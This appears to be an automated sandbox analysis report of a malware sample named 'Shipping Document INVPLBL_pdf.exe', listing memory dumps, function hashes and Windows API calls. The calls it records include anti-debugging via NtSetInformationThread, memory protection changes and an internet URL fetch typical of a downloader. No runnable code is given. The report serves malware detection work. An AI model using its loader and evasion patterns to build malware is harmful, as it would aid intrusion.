Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2966956bf409e3b159fbb32af5cf503fb2c3ed239288db945adca16fbb665da3
Instruction ID: d79e48c4eb496eaa8894097bfb2f88eeb7023734af2a71cf813d123f14f1e4b2
Opcode Fuzzy Hash: 2966956bf409e3b159fbb32af5cf503fb2c3ed239288db945adca16fbb665da3
Instruction Fuzzy Hash: 2A2117B2F5E502CEE3645A44A494A307670AB47384FB168BF86073A4D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040750D, Relevance: 1.3, APIs: 1, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 34dc2119ee44102cae4bd518fb01548cc549e8f00c04e78e2eb189c8d4daeae8
Instruction ID: 7c30659824e7a8b1b046c8a881d3752302c1717c274d361d7b796d3bd6cbd80c
Opcode Fuzzy Hash: 34dc2119ee44102cae4bd518fb01548cc549e8f00c04e78e2eb189c8d4daeae8
Instruction Fuzzy Hash: 97212AB2F4E502DED3545A58A490A707670AB47344FB1687B85073A4D2D63D3603FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407539, Relevance: 1.3, APIs: 1, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 88dcc23f48a322fb354b4c6f5368590343543ff5d28e5b791b47c608a59e2fbc
Instruction ID: c43e9165b1397ee2874eddae238f9e728b63c86bce22bbc98ee6d13d4c64fa8b
Opcode Fuzzy Hash: 88dcc23f48a322fb354b4c6f5368590343543ff5d28e5b791b47c608a59e2fbc
Instruction Fuzzy Hash: 792129B2F5E502CEE3645A44A494B307670AB47384FB168BB86073A4D2D63D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0232217F, Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8d29e35063dec90e6e9b201df9dea529a0bcd63e4ea0907b684fc53722a608
Instruction ID: 8b5aa40638f5e00bf1d2b8ef0ab97fba484764990408aa21d88494b3cea93218
Opcode Fuzzy Hash: 4c8d29e35063dec90e6e9b201df9dea529a0bcd63e4ea0907b684fc53722a608
Instruction Fuzzy Hash: 60D11A71740722AFE7249E28CCD0BD673AABF18750F944329EC9983641DB75E899CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02327A40, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3a9355f5eefbe2dc7c38c18fa67dfb966381da54c1d9b5549a549addd616c0e5
Instruction ID: ef260c1b5c430d6ce188fe5c8682a269d682ffc0bff229a64990b753f179573d
Opcode Fuzzy Hash: 3a9355f5eefbe2dc7c38c18fa67dfb966381da54c1d9b5549a549addd616c0e5
Instruction Fuzzy Hash: EBB108356043629FDB25CE3885E47A5B792AF13360F5883A9C9E28B2D6D725C44AC722

Uniqueness

Uniqueness Score: -1.00%

Function 023279F9, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: cff66fe1303d9ecd353be214b6d2257194b149e69692094201b1e72a25fdd0b0
Instruction ID: bb5790ab2ee07bef2b1a71dfde34fcab40c2c789b57d0ddbcab983b5e9214660
Opcode Fuzzy Hash: cff66fe1303d9ecd353be214b6d2257194b149e69692094201b1e72a25fdd0b0
Instruction Fuzzy Hash: EE7134756447628FDB21DF388494791BBE2BF23360F5882A9D8E18F2E7D725C84AC611

Uniqueness

Uniqueness Score: -1.00%

Function 0232289C, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52587a55c9161046178208191efab0778fa5550fd5c6560bec0f3c307b83964
Instruction ID: c2267cb960adf39ae2a3d20d4f9c0a5c1d906e51004588f036276e97689f9710
Opcode Fuzzy Hash: e52587a55c9161046178208191efab0778fa5550fd5c6560bec0f3c307b83964
Instruction Fuzzy Hash: C2312B31B406229FD7649E28CC90BE673ABBF04720F954329EC55D7692CB16D88DCB90

Uniqueness

Uniqueness Score: -1.00%

Function 02322B58, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d294ea4d70b6b25878fb3902cd11d18eed8273bf1935d6f95420af6461234e3
Instruction ID: 7f29b3aa34e2620599697fec9bd784966110c980cce450818be163e77fa8570a
Opcode Fuzzy Hash: 2d294ea4d70b6b25878fb3902cd11d18eed8273bf1935d6f95420af6461234e3
Instruction Fuzzy Hash: FD317C30640324EFEF31AF248DA9BE633A6EF15750F91415AED854F1D2D375C889CA22

Uniqueness

Uniqueness Score: -1.00%

Function 02326D75, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23bb90a41a52321c73362a89fab17cdfad4d9977557b885bb006fcfa372ac896
Instruction ID: 8c22e2b435e92fcec12ea4f4c9574895d77997225ea2ca6930b5799a270c8ee0
Opcode Fuzzy Hash: 23bb90a41a52321c73362a89fab17cdfad4d9977557b885bb006fcfa372ac896
Instruction Fuzzy Hash: 57F0A039300220CFD715DA28C2E6F5A73BEEF44B00F118466EC01C7626C335E888CE51

Uniqueness

Uniqueness Score: -1.00%

Function 02326A99, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f33e9eadbb6a9992139e3a556dda0b1665b67a3095c71d383b73ee3e652394
Instruction ID: 3e7ec602e1b712c5c755dc63649c1134782079e391b37c26bf2c8576adda20e9
Opcode Fuzzy Hash: b2f33e9eadbb6a9992139e3a556dda0b1665b67a3095c71d383b73ee3e652394
Instruction Fuzzy Hash: F1C08C3A10020ABBDF02AFA0C80C7CE3E22BF08210F408424BD06C5004C232C9609B20

Uniqueness

Uniqueness Score: -1.00%

Function 02323BA8, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42ae82364cdfe253beed325eed8899ab48037cc42fa049032181ab434dac504
Instruction ID: df71bda3ea4d5b0d96970d16aa724e9ac853c948060e28b2df682f32b1e87335
Opcode Fuzzy Hash: a42ae82364cdfe253beed325eed8899ab48037cc42fa049032181ab434dac504
Instruction Fuzzy Hash: DBC04CB23425808BF749CE19C491B0473A5AF41945B5D44A4E442CB655D314E9409610

Uniqueness

Uniqueness Score: -1.00%

Function 02326722, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777b5ca49c035bb4f6aec782d3f43bb3ede0faaccb16bec1d922569827440f4a
Instruction ID: cab28b90c3b0b27a8102300e75547a10114d76b486cb0070f3991c6e059695a2
Opcode Fuzzy Hash: 777b5ca49c035bb4f6aec782d3f43bb3ede0faaccb16bec1d922569827440f4a
Instruction Fuzzy Hash: 72C0923ABA26848FE351CA08C4A0FC073A2BF00B00FC50480E0218BBD2C32CEC40CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Shipping Document INVPLBL_pdf.exe PID: 6704 Parent PID: 7072 Shipping Document INVPLBL_pdf.exeCOMMON

Executed Functions

Function 00564887, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 627COMMON

Download Yara Rule

Strings

1.!T, xrefs: 00560890
0={,, xrefs: 00564A40
ntdll, xrefs: 00564F6C
pi32, xrefs: 00564F06
TM, xrefs: 005638BD

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: 0={,$1.!T$ntdll$pi32$TM
API String ID: 0-1308584630
Opcode ID: fe33b203a31786c42097445ef24226218d9b50a38af6fa47dae41a53b635c6e2
Instruction ID: eac8eaf28648d4d7e1b7c31b9bcfcb5ece7c3f8c03d9c5936d0348c5e3faaed0
Opcode Fuzzy Hash: fe33b203a31786c42097445ef24226218d9b50a38af6fa47dae41a53b635c6e2
Instruction Fuzzy Hash: 082218747403069FEF20AE64CC9A7EE3FA2FF95340FA08529FD8597281DB7498958B41

Uniqueness

Uniqueness Score: -1.00%

Function 00560A6B, Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 747COMMON

Download Yara Rule

Strings

1.!T, xrefs: 00560890
W.E, xrefs: 0056510A

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: W.E$1.!T
API String ID: 0-1435519016
Opcode ID: 3ba3e95eda415956bb21c32218a21b10e18c6cf667ccedb87950e6969942e287
Instruction ID: a79c499d8219b84b26576652470e0657f200df9172b4e0d07873066a5b672739
Opcode Fuzzy Hash: 3ba3e95eda415956bb21c32218a21b10e18c6cf667ccedb87950e6969942e287
Instruction Fuzzy Hash: 9622D3306447479EEF3069648DA97FF2F66BF97390F740629EC869B1C2E765C881C602

Uniqueness

Uniqueness Score: -1.00%

Function 00564046, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 463fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00563FB9,005640C6,00560957), ref: 0056406C

Strings

1.!T, xrefs: 00560890
TM, xrefs: 005638BD

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: CreateFile
String ID: 1.!T$TM
API String ID: 823142352-2757424881
Opcode ID: 619a18024722873b48d4f05665ffaea15dc6af63f69aee79ea227de4c91a8db7
Instruction ID: 3bc487040bd66aa80c378f0e0ee7ce8f4a722ffafd8a7bb4d9096c057b78bbfe
Opcode Fuzzy Hash: 619a18024722873b48d4f05665ffaea15dc6af63f69aee79ea227de4c91a8db7
Instruction Fuzzy Hash: 57E14970740306AEFF206E64CC9ABEA3E62FF95710FA04125FE85A72C1D7B599C59B01

Uniqueness

Uniqueness Score: -1.00%

Function 005644F9, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 273networknativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
InternetOpenA.WININET(00564DC1,00000000,00000000,00000000,00000000,0056181E,00000000,00000000,00000000,00000000,00000035,00000347,?,00564118), ref: 00564523
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,00000004,?,000000FF), ref: 00564670

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen$InformationThread
String ID: 1.!T
API String ID: 4048244414-3147410236
Opcode ID: a369a809687011122a3612389fa106fc1deb7d152c8da0ab879892f8d3589bd3
Instruction ID: 2d7c151d88fb00db727c434e8610a2f5bff0d503ffcfef6ee0babc1d87e8da6f
Opcode Fuzzy Hash: a369a809687011122a3612389fa106fc1deb7d152c8da0ab879892f8d3589bd3
Instruction Fuzzy Hash: A08138706403479EEF306E74CC95BEE2BA6BF95790FA04521FD8AAB1C1E771C880DA11

Uniqueness

Uniqueness Score: -1.00%

Function 0056861B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247nativeservicethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB
EnumServicesStatusA.ADVAPI32 ref: 00568C7B

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationServicesStatusThread
String ID: 1.!T
API String ID: 2214395652-3147410236
Opcode ID: d959f2d89641aafd7d76ac1006e83ce39768cf4a809b7de646694338c2326815
Instruction ID: 61ca7a86fb3ebf352af4b3a8249856e478f027621a5ea54579300cf922f6fc7c
Opcode Fuzzy Hash: d959f2d89641aafd7d76ac1006e83ce39768cf4a809b7de646694338c2326815
Instruction Fuzzy Hash: 917126302453068EEF246A74C8997BB2FA1BF95760F744B2AED429B1C1EF64C8C0D712

Uniqueness

Uniqueness Score: -1.00%

Function 0056062E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(005606F0,?,00000000,?,?,?,?,?,?,?,00560375), ref: 005606CD
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: a0208671380d854cd176eba90ecc63967c202502d8153de712eb2264d212c321
Instruction ID: 4a7c89a4dd2ab4d4915a660a0e80d5c85a9affd1b4ba45b8dbb436790228034d
Opcode Fuzzy Hash: a0208671380d854cd176eba90ecc63967c202502d8153de712eb2264d212c321
Instruction Fuzzy Hash: E34147307403069AEF50BA748C9ABEF2BA5FFD9764F701626FC56D72C1EA61C881C611

Uniqueness

Uniqueness Score: -1.00%

Function 00562B0C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: e2d61d341ea0f0843fbe8a8ce580b1a7987fdc14c71c68305c40959741eeeafe
Instruction ID: f376602c6a63fa976e72d4243947f2736459c2c652b638c9c503bcc13b464a56
Opcode Fuzzy Hash: e2d61d341ea0f0843fbe8a8ce580b1a7987fdc14c71c68305c40959741eeeafe
Instruction Fuzzy Hash: C8713B70240306AEFF20BE748C9ABEA2BA5FF95750F604626FD469B1D2D761C881C612

Uniqueness

Uniqueness Score: -1.00%

Function 00561380, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004), ref: 005613D5

Strings

W.E, xrefs: 0056510A

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: W.E
API String ID: 2706961497-3845452836
Opcode ID: c902971c8c8c0e42efcf4c29bfd5b08db807dfbe5ee94e5b3ee80ad6cbdb692e
Instruction ID: da874977913190cf6720ed4b7fae33957449389faf50062535f65933c12ce504
Opcode Fuzzy Hash: c902971c8c8c0e42efcf4c29bfd5b08db807dfbe5ee94e5b3ee80ad6cbdb692e
Instruction Fuzzy Hash: 1F519B71284745AEDF219A208E6A7E93F62BF43390F6D025AEC815B1E2F7358C85C709

Uniqueness

Uniqueness Score: -1.00%

Function 00561343, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004), ref: 005613D5

Strings

W.E, xrefs: 0056510A

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: W.E
API String ID: 2706961497-3845452836
Opcode ID: 770a01ed6083036cda0958abf52b73e57c83196744a3ef4b842b08fa6d146fda
Instruction ID: ce4cec095971cb9a3bd359d4dab313717177c8f4271bfc087e3b21061f7887b0
Opcode Fuzzy Hash: 770a01ed6083036cda0958abf52b73e57c83196744a3ef4b842b08fa6d146fda
Instruction Fuzzy Hash: D9518A71284745AEDF215A608E6E7F93F62BF43390F6D025AECC15B1A2F7348885C309

Uniqueness

Uniqueness Score: -1.00%

Function 00562F3D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: f46dae7a9a82eb14b14445961bc4ccc4a65370199e4d9a9f578d5139c36b824c
Instruction ID: 530a8b3e66e39bcabdb0e6d7331130eef360fee7995ddf57e4c57aa84438e6f9
Opcode Fuzzy Hash: f46dae7a9a82eb14b14445961bc4ccc4a65370199e4d9a9f578d5139c36b824c
Instruction Fuzzy Hash: 424149703407069FEF20AAB88CD579F2F91FF95764F604635E956872C6E764C881C742

Uniqueness

Uniqueness Score: -1.00%

Function 00563A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: fd969fc3b791ebc45b9140a3bb36bc69ed266691a75e7dd0e9f9a8a6ad1abbc0
Instruction ID: 22775776b4f4d76997317835f2922f11a0bc438f895d6f91cd5491d329cff8e2
Opcode Fuzzy Hash: fd969fc3b791ebc45b9140a3bb36bc69ed266691a75e7dd0e9f9a8a6ad1abbc0
Instruction Fuzzy Hash: 0F419C712443465FEF50AA748CD97AF3FA1BF95720F64052BE886D75C2E760C880C352

Uniqueness

Uniqueness Score: -1.00%

Function 00566558, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 145nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 3812f3bc2ed3d80de799ea5a7c569cbbe15848461df7027624ccc7c8e8692201
Instruction ID: 13fe7aa3ab0bd67ca58927331307343f4cdcdfd30c4c5b573b37f91b8036cd66
Opcode Fuzzy Hash: 3812f3bc2ed3d80de799ea5a7c569cbbe15848461df7027624ccc7c8e8692201
Instruction Fuzzy Hash: CB4128707403069AEF20AA748C967DF2FA2FFD9764FB04626FD46872C1E775C8808651

Uniqueness

Uniqueness Score: -1.00%

Function 00564018, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00564046: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00563FB9,005640C6,00560957), ref: 0056406C

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: CreateFileInformationThread
String ID: 1.!T
API String ID: 2580995559-3147410236
Opcode ID: e1624790ebc1e0f18020f7e6843f5e4b497fcb01890ddf94dc2261a30bb6128e
Instruction ID: f5d2b6ebcffd283c739e565ab0ba2b438b7ab037d5465590934baefaab602603
Opcode Fuzzy Hash: e1624790ebc1e0f18020f7e6843f5e4b497fcb01890ddf94dc2261a30bb6128e
Instruction Fuzzy Hash: 284149707403065AEF20BAB88CDA7EF2EA5BFD5764FB01626FD52D71C1E765C8808612

Uniqueness

Uniqueness Score: -1.00%

Function 00562CC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 47b5b1bcf90a749e0e36f38b9c5baaeb285e6ba945f618c7c5bb6bc6312ee736
Instruction ID: 1cb8969f0a99dbd25c829be59e158908916f5bac170b8dee1c2dd6b307264e42
Opcode Fuzzy Hash: 47b5b1bcf90a749e0e36f38b9c5baaeb285e6ba945f618c7c5bb6bc6312ee736
Instruction Fuzzy Hash: 0F312A703403069AEF607AB44CDABEF2EA1BFD5B50F700626FD569B1C1D6A0C8819612

Uniqueness

Uniqueness Score: -1.00%

Function 00562D64, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 268e212b794613afe616c321cab3e7e49f814b2f8833d3bb260f5b01fbac6ff4
Instruction ID: 959376a7e7fba72f4f9220fecd6f4dc9bde337eb2398bfbdcb5656cadc480fae
Opcode Fuzzy Hash: 268e212b794613afe616c321cab3e7e49f814b2f8833d3bb260f5b01fbac6ff4
Instruction Fuzzy Hash: 13314E707403065AEF20BAB48CDA7DF2FA1FFD9760F700626FD56971C1E660C8818602

Uniqueness

Uniqueness Score: -1.00%

Function 00560709, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 30ccacd35ee2f59d22ad2bbb598343b0f2ba33fe2deb7606675e8db4f0f98083
Instruction ID: 0bdae3c63e5d72d95786209bc9ddb65912176eab1b6a97e980ba549560e4faa2
Opcode Fuzzy Hash: 30ccacd35ee2f59d22ad2bbb598343b0f2ba33fe2deb7606675e8db4f0f98083
Instruction Fuzzy Hash: 583127707403169AEF50BAB48CDA7EF2FA5FFD9764F700626FD56972C1E660C8808212

Uniqueness

Uniqueness Score: -1.00%

Function 00560758, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: b53e1b6e435f53fa56c64705a870bde8ae5f46637905e9830d33a1ddee4679c0
Instruction ID: be1ef694e0785cc3889bb935b5c0c926dbd5403120745451e17a118e699c2a14
Opcode Fuzzy Hash: b53e1b6e435f53fa56c64705a870bde8ae5f46637905e9830d33a1ddee4679c0
Instruction Fuzzy Hash: 623148307403169AEF60BAB48CDA79F2FA5BFD8754F700636F956D72C2E661C8808202

Uniqueness

Uniqueness Score: -1.00%

Function 005607AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: b365a5f44261b2e43559e949fa2e2cac4a1358367159ddde2f2d20c93131d265
Instruction ID: 65e359ab1256f2885712620cf52c15525f048b3c611ad7a583e6690d8dc2853e
Opcode Fuzzy Hash: b365a5f44261b2e43559e949fa2e2cac4a1358367159ddde2f2d20c93131d265
Instruction Fuzzy Hash: AA3129307403159AEB50BAB48CCA79F3BA5BF98764F700A2AFD56971C2D760C8C1C742

Uniqueness

Uniqueness Score: -1.00%

Function 00560863, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 9f60855bb3fe8c80c76fbf654d6fbc6a1e35922bbfec39d37fe1975055e127e3
Instruction ID: 0c70390c6e43016eb76a3e1019149012f1cf2d34c83dc30f5aed9ab0730627ee
Opcode Fuzzy Hash: 9f60855bb3fe8c80c76fbf654d6fbc6a1e35922bbfec39d37fe1975055e127e3
Instruction Fuzzy Hash: F72148342003158AEB50BEB88CC979F3BA5BF88764F600A2AFD52972C2D720C8C1C742

Uniqueness

Uniqueness Score: -1.00%

Function 00560830, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00568D14,F21FD920,00568801,?,00000000), ref: 005608FB

Strings

1.!T, xrefs: 00560890

Memory Dump Source

Source File: 0000000A.00000002.596081636.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: b0e45467e8de5498b3c4ac8fed5e0e96917f89dc44cfc72396d078d625d1294e
